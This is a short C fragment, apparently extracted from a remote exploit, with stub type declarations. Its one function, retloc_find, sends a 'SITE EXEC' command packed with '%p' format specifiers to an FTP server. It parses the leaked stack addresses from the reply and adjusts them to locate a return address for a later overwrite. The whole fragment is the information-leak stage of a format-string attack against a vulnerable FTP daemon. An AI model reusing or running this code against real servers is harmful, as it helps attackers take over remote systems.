
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int recv (int ,char*,int,int ) ;
 int retloc ;
 int send (int ,char*,int,int ) ;
 int sock ;
 int sscanf (char*,char*,int*) ;
 int strcat (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 int tmpaddr ;

void
retloc_find(void)
{
int i;
char rbuf[1024];
char sbuf[1024];
char *ptr;

  strcpy(sbuf, "SITE EXEC ");
  for(i = 0; i < 6; i++)
 strcat(sbuf, "%p ");
  strcat(sbuf, "\n");
  send(sock, sbuf, strlen(sbuf), 0);

  recv(sock, rbuf, 1024, 0);
  ptr = rbuf;
  for(i = 0; i < 5; i++)
 {
   while(*ptr != ' ')
    ptr++;
   ptr++;
 }
  ptr[strlen(ptr) - 2] = '\x00';
  ptr[strlen(ptr) - 1] = '\x00';
  sscanf(ptr, "%p", &retloc);
  sscanf(ptr, "%p", &tmpaddr);
  retloc -= 0x40;

}
